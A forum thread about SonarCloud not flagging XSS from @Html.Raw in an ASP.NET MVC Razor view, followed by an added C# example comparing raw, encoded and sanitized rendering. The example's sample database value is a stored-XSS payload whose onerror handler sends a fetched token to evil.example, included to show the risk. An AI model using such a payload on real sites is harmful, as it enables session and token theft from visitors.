Cross-site scripting detection in asp.net (MVC) project

We have an asp.net (MVC) project on .Net 4.8. I would have expected that anywhere we use @Html.Raw in a razor template that SonarCloud would flag a potential XSS. For example:

@Html.Raw( Model.InstructionsHtml )

If the model value is coming from the database, how does Sonar know if it’s tainted or not? Shouldn’t this at least appear in Security Hotspot?

I am using SonarScanner.MSBuild.exe with the default options for the project that was created in the SonarCloud.io interface.

Hi @steve_c,

What is the format/type of your Model.InstructionsHtml variable?

Thanks.

Mickaël

it’s a string

And is it filled with some query string value or something else?

According to this rule, the taint analysis should appear when the InstructionHtml variable is written itself.

As mentioned, it's coming from a value stored in the database. Shouldn't this at least be flagged as a security hotspot since we don't know if the stored values are tainted?

Hello Steve

  • The Razor language is not supported for the moment. So even if some values are tainted without a doubt, SonarQube/SonarCloud is not able to raise issues.

  • Stored XSSs are also not supported, because of the risk of a significant false-positive rate, but your suggestion about raising a hotspot might be interesting.

Thank you for pointing out these problems. We will try to handle them; it can take time because it involves major work on the products.

Don’t hesitate in the future if you see some possible improvements to the rules.

Eric

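Since the thread establishes that neither the Razor view nor the stored (database-sourced) flow is covered by the analyzer, the `@Html.Raw` call has to be reviewed by hand. The following is an added example, not code from the thread or from SonarSource, showing what the three rendering choices do to a value an attacker managed to store in the `InstructionsHtml` column. The stored payload is constructed for the example; the sanitizer is the HtmlSanitizer NuGet package (namespace `Ganss.Xss`, an assumption about the version in use), and the method names are illustrative.

```csharp
// Added example: what @Html.Raw, default Razor encoding, and allowlist
// sanitization each do to a DB-sourced string that carries markup.
// Assumes the HtmlSanitizer NuGet package is referenced (namespace Ganss.Xss).
using System;
using System.Net;
using Ganss.Xss;

class StoredXssDemo
{
    // Constructed sample of a row value an attacker got into the table,
    // e.g. through an admin form or a bulk import that never encoded input.
    const string StoredValue =
        "<p>Step 1: open the valve.</p>" +
        "<img src=x onerror=\"fetch('/api/token').then(r=>r.text())" +
        ".then(t=>location='https://evil.example/?t='+t)\">";

    // Equivalent of @Html.Raw(Model.InstructionsHtml): the string goes into
    // the response unchanged, so the onerror handler runs for every visitor.
    public static string RenderRaw(string html) => html;

    // Equivalent of @Model.InstructionsHtml: Razor HTML-encodes by default.
    // Safe, but the <p> markup is shown literally, which is usually unwanted.
    public static string RenderEncoded(string html) => WebUtility.HtmlEncode(html);

    // Allowlist sanitization, then @Html.Raw on the result. Apply it on the
    // way into the database as well as at render time so existing rows are covered.
    public static string RenderSanitized(string html)
    {
        var sanitizer = new HtmlSanitizer();

        sanitizer.AllowedTags.Clear();
        foreach (var tag in new[] { "p", "br", "ul", "ol", "li", "strong", "em", "a" })
            sanitizer.AllowedTags.Add(tag);

        sanitizer.AllowedAttributes.Clear();
        sanitizer.AllowedAttributes.Add("href");

        sanitizer.AllowedSchemes.Clear();
        sanitizer.AllowedSchemes.Add("https");

        // <img> is not allowed, so the element and its onerror handler are dropped;
        // the <p> paragraph survives.
        return sanitizer.Sanitize(html);
    }

    static void Main()
    {
        Console.WriteLine("Raw:       " + RenderRaw(StoredValue));
        Console.WriteLine("Encoded:   " + RenderEncoded(StoredValue));
        Console.WriteLine("Sanitized: " + RenderSanitized(StoredValue));
    }
}
```

Because the analyzer will not raise anything here, a cheap interim check is to treat every `Html.Raw(` in the views as a finding to be justified in review, for example with `git grep -n "Html.Raw(" -- "*.cshtml"`, and to accept only call sites whose argument is either a constant or the output of a sanitizer like the one above.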